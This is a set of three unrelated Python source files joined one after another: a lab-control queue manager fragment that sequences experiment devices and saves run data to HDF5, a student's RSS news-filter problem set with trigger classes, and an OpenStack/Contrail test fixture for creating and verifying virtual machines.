success = self.transition_device_to_buffered(name,transition_list,path,restart_function)
if not success:
logger.error('%s has an error condition, aborting run' % name)
error_condition = True
break
except Exception as e:
logger.exception('Exception while transitioning %s to buffered mode.'%(name))
error_condition = True
break
if error_condition:
break
try:
# Wait for a device to transtition_to_buffered:
logger.debug('Waiting for the following devices to finish transitioning to buffered mode: %s'%str(transition_list))
device_name, result = self.current_queue.get(timeout=2)
#Handle abort button signal
if device_name == 'Queue Manager' and result == 'abort':
# we should abort the run
logger.info('abort signal received from GUI')
abort = True
break
if result == 'fail':
logger.info('abort signal received during transition to buffered of %s' % device_name)
error_condition = True
break
elif result == 'restart':
logger.info('Device %s was restarted, aborting shot.'%device_name)
restarted = True
break
logger.debug('%s finished transitioning to buffered mode' % device_name)
# The tab says it's done, but does it have an error condition?
if self.get_device_error_state(device_name,transition_list):
logger.error('%s has an error condition, aborting run' % device_name)
error_condition = True
break
del transition_list[device_name]
except queue.Empty:
# It's been 2 seconds without a device finishing
# transitioning to buffered. Is there an error?
for name in transition_list:
if self.get_device_error_state(name,transition_list):
error_condition = True
break
if error_condition:
break
# Has programming timed out?
if time.time() - start_time > timeout_limit:
logger.error('Transitioning to buffered mode timed out')
timed_out = True
break
# Handle if we broke out of loop due to timeout or error:
if timed_out or error_condition or abort or restarted:
# Pause the queue, re add the path to the top of the queue, and set a status message!
# only if we aren't responding to an abort click
if not abort:
self.manager_paused = True
self.prepend(path)
if timed_out:
self.set_status("Programming timed out\nQueue paused")
elif abort:
self.set_status("Aborted")
elif restarted:
self.set_status("Device restarted in transition to\nbuffered. Aborted. Queue paused.")
else:
self.set_status("Device(s) in error state\nQueue Paused")
# Abort the run for all devices in use:
# need to recreate the queue here because we don't want to hear from devices that are still transitioning to buffered mode
self.current_queue = queue.Queue()
for tab in devices_in_use.values():
# We call abort buffered here, because if each tab is either in mode=BUFFERED or transition_to_buffered failed in which case
# it should have called abort_transition_to_buffered itself and returned to manual mode
# Since abort buffered will only run in mode=BUFFERED, and the state is not queued indefinitely (aka it is deleted if we are not in mode=BUFFERED)
# this is the correct method call to make for either case
tab.abort_buffered(self.current_queue)
# We don't need to check the results of this function call because it will either be successful, or raise a visible error in the tab.
# disconnect restart signal from tabs
inmain(tab.disconnect_restart_receiver,restart_function)
# disconnect abort button and disable
inmain(self._ui.queue_abort_button.clicked.disconnect,abort_function)
inmain(self._ui.queue_abort_button.setEnabled,False)
# Start a new iteration
continue
##########################################################################################################################################
# SCIENCE! #
##########################################################################################################################################
# Get front panel data, but don't save it to the h5 file until the experiment ends:
states,tab_positions,window_data,plugin_data = self.BLACS.front_panel_settings.get_save_data()
self.set_status("Running (program time: %.3fs)..."%(time.time() - start_time), path)
# A Queue for event-based notification of when the experiment has finished.
experiment_finished_queue = queue.Queue()
logger.debug('About to start the master pseudoclock')
run_time = time.localtime()
##########################################################################################################################################
# Plugin callbacks #
##########################################################################################################################################
for callback in plugins.get_callbacks('science_starting'):
try:
callback(path)
except Exception:
logger.exception("Plugin callback raised an exception")
#TODO: fix potential race condition if BLACS is closing when this line executes?
self.BLACS.tablist[self.master_pseudoclock].start_run(experiment_finished_queue)
# Wait for notification of the end of run:
abort = False
restarted = False
done = False
while not (abort or restarted or done):
try:
done = experiment_finished_queue.get(timeout=0.5) == 'done'
except queue.Empty:
pass
try:
# Poll self.current_queue for abort signal from button or device restart
device_name, result = self.current_queue.get_nowait()
if (device_name == 'Queue Manager' and result == 'abort'):
abort = True
if result == 'restart':
restarted = True
# Check for error states in tabs
for device_name, tab in devices_in_use.items():
if self.get_device_error_state(device_name,devices_in_use):
restarted = True
except queue.Empty:
pass
if abort or restarted:
for devicename, tab in devices_in_use.items():
if tab.mode == MODE_BUFFERED:
tab.abort_buffered(self.current_queue)
# disconnect restart signal from tabs
inmain(tab.disconnect_restart_receiver,restart_function)
# Disable abort button
inmain(self._ui.queue_abort_button.clicked.disconnect,abort_function)
inmain(self._ui.queue_abort_button.setEnabled,False)
if restarted:
self.manager_paused = True
self.prepend(path)
self.set_status("Device restarted during run.\nAborted. Queue paused")
elif abort:
self.set_status("Aborted")
if abort or restarted:
# after disabling the abort button, we now start a new iteration
continue
logger.info('Run complete')
self.set_status("Saving data...", path)
# End try/except block here
except Exception:
logger.exception("Error in queue manager execution. Queue paused.")
# Raise the error in a thread for visibility
zprocess.raise_exception_in_thread(sys.exc_info())
# clean up the h5 file
self.manager_paused = True
# is this a repeat?
try:
with h5py.File(path, 'r') as h5_file:
repeat_number = h5_file.attrs.get('run repeat', 0)
except:
repeat_numer = 0
# clean the h5 file:
self.clean_h5_file(path, 'temp.h5', repeat_number=repeat_number)
try:
shutil.move('temp.h5', path)
except Exception:
msg = ('Couldn\'t delete failed run file %s, ' % path +
'another process may be using it. Using alternate '
'filename for second attempt.')
logger.warning(msg, exc_info=True)
shutil.move('temp.h5', path.replace('.h5','_retry.h5'))
path = path.replace('.h5','_retry.h5')
# Put it back at the start of the queue:
self.prepend(path)
# Need to put devices back in manual mode
self.current_queue = queue.Queue()
for devicename, tab in devices_in_use.items():
if tab.mode == MODE_BUFFERED or tab.mode == MODE_TRANSITION_TO_BUFFERED:
tab.abort_buffered(self.current_queue)
# disconnect restart signal from tabs
inmain(tab.disconnect_restart_receiver,restart_function)
self.set_status("Error in queue manager\nQueue paused")
# disconnect and disable abort button
inmain(self._ui.queue_abort_button.clicked.disconnect,abort_function)
inmain(self._ui.queue_abort_button.setEnabled,False)
# Start a new iteration
continue
##########################################################################################################################################
# SCIENCE OVER! #
##########################################################################################################################################
finally:
##########################################################################################################################################
# Plugin callbacks #
##########################################################################################################################################
for callback in plugins.get_callbacks('science_over'):
try:
callback(path)
except Exception:
logger.exception("Plugin callback raised an exception")
##########################################################################################################################################
# Transition to manual #
##########################################################################################################################################
# start new try/except block here
try:
with h5py.File(path,'r+') as hdf5_file:
self.BLACS.front_panel_settings.store_front_panel_in_h5(hdf5_file,states,tab_positions,window_data,plugin_data,save_conn_table=False, save_queue_data=False)
data_group = hdf5_file['/'].create_group('data')
# stamp with the run time of the experiment
hdf5_file.attrs['run time'] = time.strftime('%Y%m%dT%H%M%S',run_time)
error_condition = False
response_list = {}
# Keep transitioning tabs to manual mode and waiting on them until they
# are all done or have all errored/restarted/failed. If one fails, we
# still have to transition the rest to manual mode:
while stop_groups:
transition_list = {}
# Transition the next group to manual mode:
for name in stop_groups.pop(min(stop_groups)):
tab = devices_in_use[name]
try:
tab.transition_to_manual(self.current_queue)
transition_list[name] = tab
except Exception as e:
logger.exception('Exception while transitioning %s to manual mode.'%(name))
error_condition = True
# Wait for their responses:
while transition_list:
logger.info('Waiting for the following devices to finish transitioning to manual mode: %s'%str(transition_list))
try:
name, result = self.current_queue.get(2)
if name == 'Queue Manager' and result == 'abort':
# Ignore any abort signals left in the queue, it is too
# late to abort in any case:
continue
except queue.Empty:
# 2 seconds without a device transitioning to manual mode.
# Is there an error:
for name in transition_list.copy():
if self.get_device_error_state(name, transition_list):
error_condition = True
logger.debug('%s is in an error state' % name)
del transition_list[name]
continue
response_list[name] = result
if result == 'fail':
error_condition = True
logger.debug('%s failed to transition to manual' % name)
elif result == 'restart':
error_condition = True
logger.debug('%s restarted during transition to manual' % name)
elif self.get_device_error_state(name, devices_in_use):
error_condition = True
logger.debug('%s is in an error state' % name)
else:
logger.debug('%s finished transitioning to manual mode' % name)
# Once device has transitioned_to_manual, disconnect restart
# signal:
tab = devices_in_use[name]
inmain(tab.disconnect_restart_receiver, restart_function)
del transition_list[name]
if error_condition:
self.set_status("Error in transtion to manual\nQueue Paused")
except Exception as e:
error_condition = True
logger.exception("Error in queue manager execution. Queue paused.")
self.set_status("Error in queue manager\nQueue paused")
# Raise the error in a thread for visibility
zprocess.raise_exception_in_thread(sys.exc_info())
if error_condition:
# clean up the h5 file
self.manager_paused = True
# is this a repeat?
try:
with h5py.File(path, 'r') as h5_file:
repeat_number = h5_file.attrs.get('run repeat', 0)
except:
repeat_number = 0
# clean the h5 file:
self.clean_h5_file(path, 'temp.h5', repeat_number=repeat_number)
try:
shutil.move('temp.h5', path)
except Exception:
msg = ('Couldn\'t delete failed run file %s, ' % path +
'another process may be using it. Using alternate '
'filename for second attempt.')
logger.warning(msg, exc_info=True)
shutil.move('temp.h5', path.replace('.h5','_retry.h5'))
path = path.replace('.h5','_retry.h5')
# Put it back at the start of the queue:
self.prepend(path)
continue
##########################################################################################################################################
# Analysis Submission #
##########################################################################################################################################
logger.info('All devices are back in static mode.')
# check for analysis Filters in Plugins
send_to_analysis = True
for callback in plugins.get_callbacks('analysis_cancel_send'):
try:
if callback(path):
send_to_analysis = False
break
except Exception:
logger.exception("Plugin callback raised an exception")
# Submit to the analysis server
if send_to_analysis:
self.BLACS.analysis_submission.get_queue().put(['file', path])
##########################################################################################################################################
# Plugin callbacks #
##########################################################################################################################################
for callback in plugins.get_callbacks('shot_complete'):
try:
callback(path)
except Exception:
logger.exception("Plugin callback raised an exception")
##########################################################################################################################################
# Repeat Experiment? #
##########################################################################################################################################
# check for repeat Filters in Plugins
repeat_shot = self.manager_repeat
for callback in plugins.get_callbacks('shot_ignore_repeat'):
try:
if callback(path):
repeat_shot = False
break
except Exception:
logger.exception("Plugin callback raised an exception")
if repeat_shot:
if ((self.manager_repeat_mode == self.REPEAT_ALL) or
(self.manager_repeat_mode == self.REPEAT_LAST and inmain(self._model.rowCount) == 0)):
# Resubmit job to the bottom of the queue:
try:
message = self.process_request(path)
except Exception:
# TODO: make this error popup for the user
self.logger.exception('Failed to copy h5_file (%s) for repeat run'%s)
logger.info(message)
self.set_status("Idle")
logger.info('Stopping')
|
ps5.py | # 6.0001/6.00 Problem Set 5 - RSS Feed Filter
# Name:
# Collaborators:
# Time:
import feedparser
import string
import time
import threading
from project_util import translate_html
from mtTkinter import *
from datetime import datetime
import pytz
#-----------------------------------------------------------------------
#======================
# Code for retrieving and parsing
# Google and Yahoo News feeds
# Do not change this code
#======================
def process(url):
"""
Fetches news items from the rss url and parses them.
Returns a list of NewsStory-s.
"""
feed = feedparser.parse(url)
entries = feed.entries
ret = []
for entry in entries:
guid = entry.guid
title = translate_html(entry.title)
link = entry.link
description = translate_html(entry.description)
pubdate = translate_html(entry.published)
try:
pubdate = datetime.strptime(pubdate, "%a, %d %b %Y %H:%M:%S %Z")
pubdate.replace(tzinfo=pytz.timezone("GMT"))
# pubdate = pubdate.astimezone(pytz.timezone('EST'))
# pubdate.replace(tzinfo=None)
except ValueError:
pubdate = datetime.strptime(pubdate, "%a, %d %b %Y %H:%M:%S %z")
newsStory = NewsStory(guid, title, description, link, pubdate)
ret.append(newsStory)
return ret
#======================
# Data structure design
#======================
# Problem 1
# TODO: NewsStory
class NewsStory(object):
def __init__(self, guid, title, description, link, pubdate):
self.guid = guid
self.title = title
self.description = description
self.link = link
self.pubdate = pubdate
def get_guid(self):
return self.guid
def get_title(self):
return self.title
def get_description(self):
return self.description
def get_link(self):
return self.link
def get_pubdate(self):
return self.pubdate
#======================
# Triggers
#======================
class Trigger(object):
def evaluate(self, story):
"""
Returns True if an alert should be generated
for the given news item, or False otherwise.
"""
# DO NOT CHANGE THIS!
raise NotImplementedError
# PHRASE TRIGGERS
# Problem 2
# TODO: PhraseTrigger
class PhraseTrigger(Trigger):
def __init__(self, phrase):
self.phrase = phrase
def is_phrase_in(self, text):
for letter in text:
if letter in string.punctuation:
text = text.replace(letter, ' ')
text = text.lower().split()
text_length = len(text)
text_check = 0
phrase = self.phrase.lower().split()
phrase_length = len(phrase)
phrase_check = 0
# print('start phrase: ', phrase)
# print('start text: ', text)
while phrase_check < phrase_length and text_check < text_length:
word = phrase[phrase_check]
if phrase_check == 0:
while text_check < text_length:
if word == text[text_check]:
break
text_check += 1
# print('first word location in text', text_check)
if text_check < text_length:
phrase_check += 1
text_check += 1
#print('first word',phrase_check,text_check)
continue
else:
break
if word == text[text_check]:
phrase_check += 1
# print('second word')
else:
phrase_check = 0
text_check += 1
return phrase_check == phrase_length
# Problem 3
# TODO: TitleTrigger
class TitleTrigger(PhraseTrigger):
def __init__(self, phrase):
PhraseTrigger.__init__(self, phrase)
def evaluate(self, story):
text = story.get_title()
return self.is_phrase_in(text)
# Problem 4
# TODO: DescriptionTrigger
class DescriptionTrigger(PhraseTrigger):
def __init__(self, phrase):
PhraseTrigger.__init__(self, phrase)
def evaluate(self, story):
text = story.get_description()
return self.is_phrase_in(text)
# TIME TRIGGERS
# Problem 5
# TODO: TimeTrigger
# Constructor:
# Input: Time has to be in EST and in the format of "%d %b %Y %H:%M:%S".
# Convert time from string to a datetime before saving it as an attribute.
class TimeTrigger(Trigger):
def __init__(self,time_check):
self.time_check = datetime.strptime(time_check, "%d %b %Y %H:%M:%S")
# Problem 6
# TODO: BeforeTrigger and AfterTrigger
class BeforeTrigger(TimeTrigger):
def __init__(self, time_string):
TimeTrigger.__init__(self, time_string)
def evaluate(self, story):
story_time = story.get_pubdate()
time_check = self.time_check
# print('story time',story_time)
# print('time_check', time_check)
if self.time_check.year > story_time.year:
# print('year true')
return True
elif self.time_check.year < story_time.year:
# print('year false')
return False
else:
if self.time_check.month > story_time.month:
# print('month true')
return True
elif self.time_check.month < story_time.month:
# print('month false')
return False
else:
story_time_in_sec = story_time.second + \
60*story_time.minute + 3600*story_time.hour + \
86400*story_time.day
time_check_in_sec = time_check.second + \
60*time_check.minute + 3600*time_check.hour + \
86400*time_check.day
# print('story_time_in_sec',story_time_in_sec)
# print('time_check_in_sec',time_check_in_sec)
return story_time_in_sec < time_check_in_sec
class AfterTrigger(TimeTrigger):
def __init__(self, time_string):
TimeTrigger.__init__(self, time_string)
def evaluate(self, story):
story_time = story.get_pubdate()
time_check = self.time_check
if self.time_check.year < story_time.year:
return True
elif self.time_check.year > story_time.year:
return False
else:
if self.time_check.month < story_time.month:
return True
elif self.time_check.month > story_time.month:
return False
else:
story_time_in_sec = story_time.second + \
60*story_time.minute + 3600*story_time.hour + \
86400*story_time.day
time_check_in_sec = time_check.second + \
60*time_check.minute + 3600*time_check.hour + \
86400*time_check.day
#print('story_time_in_sec',story_time_in_sec)
#print('time_check_in_sec',time_check_in_sec)
return story_time_in_sec > time_check_in_sec
# COMPOSITE TRIGGERS
# Problem 7
# TODO: NotTrigger
class NotTrigger(Trigger):
def __init__(self,trigger):
self.trigger = trigger
def evaluate(self, story):
return not self.trigger.evaluate(story)
# Problem 8
# TODO: AndTrigger
class AndTrigger(Trigger):
def __init__(self,trig1,trig2):
self.trig1 = trig1
self.trig2 = trig2
def evaluate(self, story):
return self.trig1.evaluate(story) and self.trig2.evaluate(story)
# Problem 9
# TODO: OrTrigger
class OrTrigger(Trigger):
def __init__(self,trig1,trig2):
self.trig1 = trig1
self.trig2 = trig2
def evaluate(self, story):
return self.trig1.evaluate(story) or self.trig2.evaluate(story)
#======================
# Filtering
#======================
# Problem 10
def filter_stories(stories, triggerlist):
"""
Takes in a list of NewsStory instances.
Returns: a list of only the stories for which a trigger in triggerlist fires.
"""
filtered_stories = []
for story in stories:
for trigger in triggerlist:
if trigger.evaluate(story):
filtered_stories += [story]
break
return filtered_stories
#======================
# User-Specified Triggers
#======================
# Problem 11
def read_trigger_config(filename):
"""
filename: the name of a trigger configuration file
Returns: a list of trigger objects specified by the trigger configuration
file.
"""
# We give you the code to read in the file and eliminate blank lines and
# comments. You don't need to know how it works for now!
trigger_file = open(filename, 'r')
lines = []
for line in trigger_file:
line = line.rstrip()
if not (len(line) == 0 or line.startswith('//')):
lines.append(line)
# TODO: Problem 11
# line is the list of lines that you need to parse and for which you need
# to build triggers
print(lines) # for now, print it so you see what it contains!
SLEEPTIME = 120 #seconds -- how often we poll
def main_thread(master):
# A sample trigger list - you might need to change the phrases to correspond
# to what is currently in the news
try:
t1 = TitleTrigger("Vietnam")
t2 = DescriptionTrigger("Trade")
t3 = DescriptionTrigger("Facebook")
t4 = AndTrigger(t2, t3)
triggerlist = [t1, t4]
# Problem 11
# TODO: After implementing read_trigger_config, uncomment this line
# triggerlist = read_trigger_config('triggers.txt')
# HELPER CODE - you don't need to understand this!
# Draws the popup window that displays the filtered stories
# Retrieves and filters the stories from the RSS feeds
frame = Frame(master)
frame.pack(side=BOTTOM)
scrollbar = Scrollbar(master)
scrollbar.pack(side=RIGHT,fill=Y)
t = "Google & Yahoo Top News"
title = StringVar()
title.set(t)
ttl = Label(master, textvariable=title, font=("Helvetica", 18))
ttl.pack(side=TOP)
cont = Text(master, font=("Helvetica",14), yscrollcommand=scrollbar.set)
cont.pack(side=BOTTOM)
cont.tag_config("title", justify='center')
button = Button(frame, text="Exit", command=root.destroy)
button.pack(side=BOTTOM)
guidShown = []
def get_cont(newstory):
if newstory.get_guid() not in guidShown:
cont.insert(END, newstory.get_title()+"\n", "title")
cont.insert(END, "\n---------------------------------------------------------------\n", "title")
cont.insert(END, newstory.get_description())
cont.insert(END, "\n*********************************************************************\n", "title")
guidShown.append(newstory.get_guid())
while True:
print("Polling . . .", end=' ')
# Get stories from Google's Top Stories RSS news feed
stories = process("http://news.google.com/news?output=rss")
# Get stories from Yahoo's Top Stories RSS news feed
stories.extend(process("http://news.yahoo.com/rss/topstories"))
stories = filter_stories(stories, triggerlist)
list(map(get_cont, stories))
scrollbar.config(command=cont.yview)
print("Sleeping...")
time.sleep(SLEEPTIME)
except Exception as e:
print(e)
if __name__ == '__main__':
root = Tk()
# root.title("Some RSS parser")
# t = threading.Thread(target=main_thread, args=(root,))
# t.start()
# root.mainloop()
|
vm_test.py | import fixtures
import re
from ipam_test import *
from vn_test import *
from util import *
import time
import traceback
from fabric.api import env
from fabric.api import run
from fabric.state import output
from fabric.state import connections as fab_connections
from fabric.operations import get, put
from fabric.context_managers import settings, hide
import socket
import paramiko
from contrail_fixtures import *
import threading
from tcutils.pkgs.install import PkgHost, build_and_install
env.disable_known_hosts = True
from webui_test import *
#output.debug= True
#@contrail_fix_ext ()
class VMFixture(fixtures.Fixture):
'''
Fixture to handle creation, verification and deletion of VM.
image_name : One of cirros-0.3.0-x86_64-uec, redmine-fe, redmine-be, ubuntu
Deletion of the VM upon exit can be disabled by setting fixtureCleanup= 'no' in params file.
If a VM with the vm_name is already present, it is not deleted upon exit. To forcefully clean them up, set fixtureCleanup= 'force'
Vn object can be a single VN object(vn_obj) or a list of VN objects(vn_objs) but not both
'''
def __init__(self, connections, vm_name, vn_obj=None,
vn_objs=[], project_name='admin',
image_name='ubuntu', subnets=[],
flavor='contrail_flavor_small',
node_name=None, sg_ids=[], count=1, userdata=None,
port_ids=[], fixed_ips=[]):
self.connections = connections
self.api_s_inspects = self.connections.api_server_inspects
self.api_s_inspect = self.connections.api_server_inspect
self.agent_inspect = self.connections.agent_inspect
self.cn_inspect = self.connections.cn_inspect
self.ops_inspect = self.connections.ops_inspects
self.quantum_fixture = self.connections.quantum_fixture
self.vnc_lib_fixture = self.connections.vnc_lib_fixture
self.quantum_h = self.quantum_fixture.get_handle()
self.vnc_lib_h = self.connections.vnc_lib
self.nova_fixture = self.connections.nova_fixture
self.node_name = node_name
self.sg_ids = sg_ids
self.count = count
self.port_ids = port_ids
self.fixed_ips = fixed_ips
self.subnets = subnets
# self.vn_fixture= vn_fixture
if vn_obj:
vn_objs = [vn_obj]
self.vn_obj = vn_obj
if type(vn_objs) is not list:
self.vn_objs = [vn_objs]
else:
self.vn_objs = vn_objs
self.project_name = project_name
self.flavor = flavor
self.image_name = image_name
self.vm_name = vm_name
self.vm_obj = None
self.vm_ip = None
self.agent_vn_obj = {}
self.vn_names = [x['network']['name'] for x in self.vn_objs]
# self.vn_fq_names = [':'.join(x['network']['contrail:fq_name'])
# for x in self.vn_objs]
self.vn_fq_names = [':'.join(self.vnc_lib_h.id_to_fq_name(x['network']['id']))
for x in self.vn_objs]
if len(vn_objs) == 1:
self.vn_name = self.vn_names[0]
self.vn_fq_name = self.vn_fq_names[0]
self.inputs = self.connections.inputs
self.logger = self.inputs.logger
self.already_present = False
self.verify_is_run = False
self.analytics_obj = self.connections.analytics_obj
self.agent_vn_obj = {}
self.agent_vrf_obj = {}
self.agent_vrf_name = {}
self.agent_vrf_id = {}
self.agent_path = {}
self.agent_l2_path = {}
self.tap_intf = {}
self.mac_addr = {}
self.agent_label = {}
self.agent_l2_label = {}
self.agent_vxlan_id = {}
self.local_ips = {}
self.vm_ip_dict = {}
self.cs_vmi_obj = {}
self.vm_ips = []
self.vm_launch_flag = True
self.vm_in_api_flag = True
self.vm_in_agent_flag = True
self.vm_in_cn_flag = True
self.vm_in_op_flag = True
self.verify_vm_not_in_setup = True
self.verify_vm_not_in_api_server_flag = True
self.verify_vm_not_in_agent_flag = True
self.verify_vm_not_in_control_nodes_flag = True
self.verify_vm_not_in_nova_flag = True
self.vm_flows_removed_flag = True
self.printlock = threading.Lock()
self.verify_vm_flag = True
self.userdata = userdata
self.vm_username = None
self.vm_password = None
if self.inputs.webui_verification_flag:
self.browser = self.connections.browser
self.browser_openstack = self.connections.browser_openstack
self.webui = WebuiTest(self.connections, self.inputs)
# end __init__
def setUp(self):
super(VMFixture, self).setUp()
self.project_fixture = self.useFixture(
ProjectFixture(vnc_lib_h=self.vnc_lib_h,
project_name=self.project_name,
connections=self.connections))
self.vn_ids = [x['network']['id'] for x in self.vn_objs]
self.vm_obj = self.nova_fixture.get_vm_if_present(
self.vm_name, self.project_fixture.uuid)
self.vm_objs = self.nova_fixture.get_vm_list(name_pattern=self.vm_name,
project_id=self.project_fixture.uuid)
if self.vm_obj:
self.already_present = True
with self.printlock:
self.logger.debug('VM %s already present, not creating it'
% (self.vm_name))
else:
if self.inputs.webui_config_flag:
self.webui.create_vm_in_openstack(self)
else:
objs = self.nova_fixture.create_vm(
project_uuid=self.project_fixture.uuid,
image_name=self.image_name,
flavor=self.flavor,
vm_name=self.vm_name,
vn_ids=self.vn_ids,
node_name=self.node_name,
sg_ids=self.sg_ids,
count=self.count,
userdata = self.userdata,
port_ids = self.port_ids,
fixed_ips = self.fixed_ips)
time.sleep(5)
self.vm_obj = objs[0]
self.vm_objs = objs
(self.vm_username, self.vm_password) = self.nova_fixture.get_image_account(
self.image_name)
# end setUp
def verify_vm_launched(self):
self.vm_launch_flag = True
self.vm_id = self.vm_objs[0].id
for vm_obj in self.vm_objs:
vm_id = vm_obj.id
self.nova_fixture.get_vm_detail(vm_obj)
for vn_name in self.vn_names:
if len(self.nova_fixture.get_vm_ip(vm_obj, vn_name)) == 0:
with self.printlock:
self.logger.error('VM %s did not seem to have got any IP'
% (vm_obj.name))
self.vm_launch_flag = self.vm_launch_flag and False
return False
self.vm_ips.append(
self.nova_fixture.get_vm_ip(vm_obj, vn_name)[0])
with self.printlock:
self.logger.info('VM %s launched on Node %s'
% (vm_obj.name, self.nova_fixture.get_nova_host_of_vm(vm_obj)))
if len(self.vm_ips) >= 1:
self.vm_ip = self.nova_fixture.get_vm_ip(
self.vm_obj, self.vn_names[0])[0]
else:
with self.printlock:
self.logger.error('VM %s did not seem to have got an IP '
'at all ' % (vm_obj.name))
self.vm_launch_flag = self.vm_launch_flag and False
return False
with self.printlock:
self.logger.info("VM %s ID is %s" % (vm_obj.name, vm_obj.id))
# end for vm_obj
self.vm_launch_flag = self.vm_launch_flag and True
return True
# end verify_vm_launched
def add_security_group(self, secgrp):
self.nova_fixture.add_security_group(self.vm_obj.id, secgrp)
def remove_security_group(self, secgrp):
self.nova_fixture.remove_security_group(self.vm_obj.id, secgrp)
def verify_security_group(self, secgrp):
cs_vmi_objs = self.api_s_inspect.get_cs_vmi_of_vm(
self.vm_id, refresh=True)
for cs_vmi_obj in cs_vmi_objs:
vmi = cs_vmi_obj['virtual-machine-interface']
if vmi.has_key('security_group_refs'):
sec_grps = vmi['security_group_refs']
for sec_grp in sec_grps:
if secgrp == sec_grp['to'][-1]:
self.logger.info(
"Security group %s is attached \ to the VM %s", secgrp, self.vm_name)
return True, None
errmsg = "Security group %s is not attached to the VM %s" % (secgrp,
self.vm_name)
self.logger.warn(errmsg)
return False, errmsg
def verify_on_setup(self, force=False):
if self.inputs.verify_on_setup == 'False' and not force:
self.logger.info('Skipping VM %s verification' % (self.vm_name))
return True
result = True
self.verify_vm_flag = True
t_launch = threading.Thread(target=self.verify_vm_launched, args=())
t_launch.start()
time.sleep(1)
t_launch.join()
if not self.vm_ip:
self.verify_vm_flag = False
result = result and False
return result
self.verify_vm_flag = result and self.nova_fixture.wait_till_vm_is_active(
self.vm_obj)
if self.inputs.webui_verification_flag:
self.webui.verify_vm_in_webui(self)
t_api = threading.Thread(target=self.verify_vm_in_api_server, args=())
t_api.start()
time.sleep(1)
t_api.join()
t_agent = threading.Thread(target=self.verify_vm_in_agent, args=())
t_agent.start()
time.sleep(1)
t_cn = threading.Thread(
target=self.verify_vm_in_control_nodes, args=())
t_cn.start()
time.sleep(1)
t_op = threading.Thread(target=self.verify_vm_in_opserver, args=())
t_op.start()
time.sleep(1)
t_agent.join()
t_cn.join()
t_op.join()
if not self.vm_launch_flag:
self.verify_vm_flag = self.verify_vm_flag and result
return False
if not self.vm_in_api_flag:
with self.printlock:
self.logger.error('VM %s verification in API Server failed'
% (self.vm_name))
result = result and False
self.verify_vm_flag = self.verify_vm_flag and result
if not self.vm_in_agent_flag:
with self.printlock:
self.logger.error('VM %s verification in Agent failed'
% (self.vm_name))
result = result and False
self.verify_vm_flag = self.verify_vm_flag and result
if not self.vm_in_cn_flag:
with self.printlock:
self.logger.error('Route verification for VM %s in Controlnodes'
' failed ' % (self.vm_name))
result = result and False
self.verify_vm_flag = self.verify_vm_flag and result
if not self.vm_in_op_flag:
with self.printlock:
self.logger.error('VM %s verification in Opserver failed'
% (self.vm_name))
result = result and False
self.verify_vm_flag = self.verify_vm_flag and result
self.verify_is_run = True
return result
# end verify_on_setup
def mini_verify_on_setup(self):
result = True
if not self.verify_vm_launched():
return False
if not self.verify_vm_in_api_server():
self.logger.error('VM %s verification in API Server failed'
% (self.vm_name))
result = result and False
if not self.verify_vm_in_agent():
self.logger.error('VM %s verification in Agent failed'
% (self.vm_name))
result = result and False
self.verify_is_run = True
return result
# end mini_verify_on_setup
def get_vrf_id(self, vn_fq_name, vn_vrf_name):
inspect_h = self.agent_inspect[self.vm_node_ip]
(domain, project, vn) = vn_fq_name.split(':')
agent_vrf_objs_vn = inspect_h.get_vna_vrf_objs(domain, project, vn)
agent_vrf_obj_vn = self.get_matching_vrf(
agent_vrf_objs_vn['vrf_list'],
vn_vrf_name)
vn_vrf_id = agent_vrf_obj_vn['ucindex']
return vn_vrf_id
# end get_vrf_id
def chk_vmi_for_vrf_entry(self, vn_fq_name):
try:
cs_vmi_obj = {}
cs_vmi_objs_vm = self.api_s_inspect.get_cs_vmi_of_vm(self.vm_id)
inspect_h = self.agent_inspect[self.vm_node_ip]
for vmi_obj in cs_vmi_objs_vm:
vmi_id = vmi_obj[
'virtual-machine-interface']['virtual_network_refs'][0]['uuid']
vmi_vn_fq_name = ':'.join(
vmi_obj['virtual-machine-interface']['virtual_network_refs'][0]['to'])
cs_vmi_obj[vmi_vn_fq_name] = vmi_obj
tap_intf = {}
tmp_vmi_id = cs_vmi_obj[vmi_vn_fq_name][
'virtual-machine-interface']['uuid']
tap_intf[vn_fq_name] = inspect_h.get_vna_tap_interface_by_vmi(
vmi_id=tmp_vmi_id)[0]
vrf_entry = tap_intf[vn_fq_name]['fip_list'][0]['vrf_name']
return vrf_entry
except IndexError, e:
self.logger.error('No VRF Entry listed')
return None
# end chk_vmi_for_vrf_entry
def chk_vmi_for_fip(self, vn_fq_name):
try:
cs_vmi_obj = {}
cs_vmi_objs_vm = self.api_s_inspect.get_cs_vmi_of_vm(self.vm_id)
inspect_h = self.agent_inspect[self.vm_node_ip]
for vmi_obj in cs_vmi_objs_vm:
vmi_id = vmi_obj[
'virtual-machine-interface']['virtual_network_refs'][0]['uuid']
vmi_vn_fq_name = ':'.join(
vmi_obj['virtual-machine-interface']['virtual_network_refs'][0]['to'])
cs_vmi_obj[vmi_vn_fq_name] = vmi_obj
tap_intf = {}
tmp_vmi_id = vmi_id = cs_vmi_obj[vmi_vn_fq_name][
'virtual-machine-interface']['uuid']
tap_intf[vn_fq_name] = inspect_h.get_vna_tap_interface_by_vmi(
vmi_id=tmp_vmi_id)[0]
fip_addr_vm = tap_intf[vn_fq_name]['fip_list'][0]['ip_addr']
return fip_addr_vm
except IndexError, e:
self.logger.error('No FIP Address listed')
return None
# end chk_vmi_for_fip
@retry(delay=2, tries=15)
def verify_vm_in_api_server(self):
'''Validate API-Server objects for a VM.
Checks if Instance IP in API Server is same as what
Orchestration system gave it.
Checks if the virtual-machine-interface's VN in API Server is correct.
'''
self.vm_in_api_flag = True
self.cs_vm_obj = {}
self.cs_vmi_objs = {}
self.cs_instance_ip_objs = {}
for cfgm_ip in self.inputs.cfgm_ips:
api_inspect = self.api_s_inspects[cfgm_ip]
self.cs_vm_obj[cfgm_ip] = api_inspect.get_cs_vm(self.vm_id)
self.cs_vmi_objs[
cfgm_ip] = api_inspect.get_cs_vmi_of_vm(self.vm_id)
self.cs_instance_ip_objs[
cfgm_ip] = api_inspect.get_cs_instance_ips_of_vm(self.vm_id)
for cfgm_ip in self.inputs.cfgm_ips:
self.logger.info("Verifying in api server %s" % (cfgm_ip))
if not self.cs_instance_ip_objs[cfgm_ip]:
with self.printlock:
self.logger.error('Instance IP of VM ID %s not seen in '
'API Server ' % (self.vm_id))
self.vm_in_api_flag = self.vm_in_api_flag and False
return False
for instance_ip_obj in self.cs_instance_ip_objs[cfgm_ip]:
ip = instance_ip_obj['instance-ip']['instance_ip_address']
if ip not in self.vm_ips:
with self.printlock:
self.logger.warn('Instance IP %s from API Server is '
' not found in VM IP list %s' % (ip, str(self.vm_ips)))
